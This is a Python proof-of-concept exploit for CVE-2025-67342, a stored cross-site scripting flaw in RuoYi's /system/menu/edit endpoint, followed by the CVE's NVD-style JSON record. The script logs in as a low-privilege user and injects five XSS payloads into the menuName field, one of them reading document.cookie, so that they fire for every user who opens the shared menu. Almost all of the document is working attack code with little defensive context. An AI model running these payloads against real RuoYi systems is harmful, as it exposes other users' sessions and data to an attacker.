CVE-2025-67342

# CVE-2025-67342 PoC - Stored XSS in RuoYi /system/menu/edit # This PoC demonstrates bypassing the XSS filter to inject malicious JavaScript import requests import sys # Configuration target_url = "http://target-server:80" login_url = f"{target_url}/login" menu_edit_url = f"{target_url}/system/menu/edit" # Login credentials (low-privilege user with menu edit permission) credentials = { "username": "attacker", "password": "password123" } # XSS Payloads - Bypassing the filter # Try multiple payloads as the filter may be updated xss_payloads = [ # Payload 1: Event handler with encoded characters "<img src=x onerror=alert(document.cookie)>", # Payload 2: Using SVG element "<svg onload=alert('XSS')>", # Payload 3: JavaScript URI in anchor "<a href='javascript:alert(document.domain)'>Click Me</a>", # Payload 4: Body onload event "<body onload=alert(String.fromCharCode(88,83,83))>", # Payload 5: Input autofocus with onfocus "<input onfocus=alert(1) autofocus>" ] def login(session): """Authenticate to RuoYi system""" response = session.post(login_url, data=credentials) return response.status_code == 200 or "token" in response.text def exploit(session, payload): """Send the XSS payload to menu edit endpoint""" # Menu data with XSS payload injected into menuName field menu_data = { "menuId": 1000, "menuName": f"{payload}Normal Menu", "orderNum": 1, "parentId": 0, "path": "/test", "component": "Layout", "isFrame": "1", "isCache": "0", "menuType": "M", "visible": "0", "status": "0", "perms": "", "icon": "#" } headers = { "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest" } response = session.post(menu_edit_url, data=menu_data, headers=headers) return response.status_code == 200 def main(): session = requests.Session() print("[*] Attempting login...") if not login(session): print("[-] Login failed") sys.exit(1) print("[+] Login successful") for i, payload in enumerate(xss_payloads, 1): print(f"[*] Trying payload {i}: {payload[:50]}...") if exploit(session, payload): print(f"[+] Payload {i} sent successfully") print(f"[+] Payload stored in menu. Visit /system/menu to trigger XSS") else: print(f"[-] Payload {i} failed") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-67342", "sourceIdentifier": "[email protected]", "published": "2025-12-12T17:15:45.477", "lastModified": "2025-12-19T15:44:54.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RuoYi versions 4.8.1 and earlier is affected by a stored XSS vulnerability in the /system/menu/edit endpoint. While the endpoint is protected by an XSS filter, the protection can be bypassed. Additionally, because the menu is shared across all users, any user with menu modification permissions can impact all users by exploiting this stored XSS vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ruoyi:ruoyi:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.8.1", "matchCriteriaId": "900166F8-5C48-4DE0-A6AF-5DB981C0EFCD"}]}]}], "references": [{"url": "https://github.com/yangzongzhuan/RuoYi/issues/308", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Issue Tracking"]}]}}